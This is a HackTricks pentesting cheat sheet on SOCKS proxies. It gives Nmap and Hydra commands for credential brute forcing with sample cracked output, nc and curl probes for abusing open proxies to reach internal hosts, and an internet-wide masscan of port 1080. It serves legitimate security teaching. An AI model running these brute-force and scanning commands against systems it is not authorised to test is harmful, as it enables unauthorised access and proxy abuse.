1080-pentesting-socks.md (3731B)
1 --- 2 title: "1080 - Pentesting Socks" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/1080-pentesting-socks.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/1080-pentesting-socks.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 1080 - Pentesting Socks 14 15 ## Basic Information 16 17 **SOCKS** relays traffic between a client and a destination through a proxy. SOCKS5 negotiates authentication methods, supports TCP `CONNECT` and `BIND`, and can relay UDP through `UDP ASSOCIATE`. Username/password authentication is a separate optional sub-negotiation. `socks5h` is a client convention that asks the proxy to resolve hostnames, avoiding local DNS resolution.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup> 18 19 **Default Port:** 1080 20 21 ## Enumeration 22 23 ### Authentication Check 24 25 ```bash 26 nmap -p 1080 <ip> --script socks-auth-info 27 ``` 28 29 The Nmap script reports the SOCKS5 authentication methods offered by the server.<sup>[[3]](#references)</sup> 30 31 ### Brute Force 32 33 #### Basic usage 34 35 ```bash 36 nmap --script socks-brute -p 1080 <ip> 37 ``` 38 39 #### Advanced usage 40 41 ```bash 42 nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 <ip> 43 ``` 44 45 #### Output 46 47 ```text 48 PORT STATE SERVICE 49 1080/tcp open socks 50 | socks-brute: 51 | Accounts 52 | patrik:12345 - Valid credentials 53 | Statistics 54 |_ Performed 1921 guesses in 6 seconds, average tps: 320 55 ``` 56 57 #### Hydra module 58 59 ```bash 60 hydra -L users.txt -P passwords.txt -s 1080 -t 16 -V <ip> socks5 61 ``` 62 63 ### Method & open-proxy enumeration 64 65 ```bash 66 nmap -sV --script socks-methods,socks-open-proxy -p 1080 <ip> 67 ``` 68 69 `socks-methods` asks the server about supported authentication types, while `socks-open-proxy` attempts an outbound connection to confirm whether the service can be abused as a relay.<sup>[[3]](#references)</sup><sup>[[4]](#references)</sup> 70 71 #### Raw handshake check 72 73 ```bash 74 printf '\x05\x01\x00' | nc -nv <ip> 1080 75 ``` 76 77 The three-byte request is `VER=05`, `NMETHODS=01`, `METHOD=00`. A successful two-byte reply of `\x05\x00` selects no authentication; `\x05\x02` selects username/password; `\x05\xff` means no offered method is acceptable.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup> 78 79 ### Quick egress validation 80 81 ```bash 82 curl --socks5-hostname <ip>:1080 https://ifconfig.me 83 curl --socks5-hostname user:pass@<ip>:1080 http://internal.target 84 ``` 85 86 Use `--socks5-hostname` (or `socks5h://` URLs) so DNS resolution happens remotely. Pair it with `proxychains4 -q nmap -sT -Pn --top-ports 200 <internal-host>` to verify whether the proxy truly provides internal reach. 87 88 ### Internet-wide discovery / fingerprinting 89 90 ```bash 91 masscan 0.0.0.0/0 -p1080 --banners --rate 100000 -oX socks.xml 92 ``` 93 94 Feed results back into NSE, `zgrab2`, or custom python scripts to prioritize promising hosts (e.g., banner strings like `3proxy`, `Dante`, `MikroTik`). 95 96 97 ## Tunneling and Port Forwarding 98 99 For info about tunneling and post forwarding check the page: [Tunneling and Port Forwarding](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/tunneling-and-port-forwarding.md) 100 101 ## References 102 103 - [1] [RFC 1928 - SOCKS Protocol Version 5](https://www.rfc-editor.org/rfc/rfc1928) 104 - [2] [RFC 1929 - Username/Password Authentication for SOCKS V5](https://www.rfc-editor.org/rfc/rfc1929) 105 - [3] [Nmap - `socks-auth-info`](https://nmap.org/nsedoc/scripts/socks-auth-info.html) 106 - [4] [Nmap - `socks-open-proxy`](https://nmap.org/nsedoc/scripts/socks-open-proxy.html)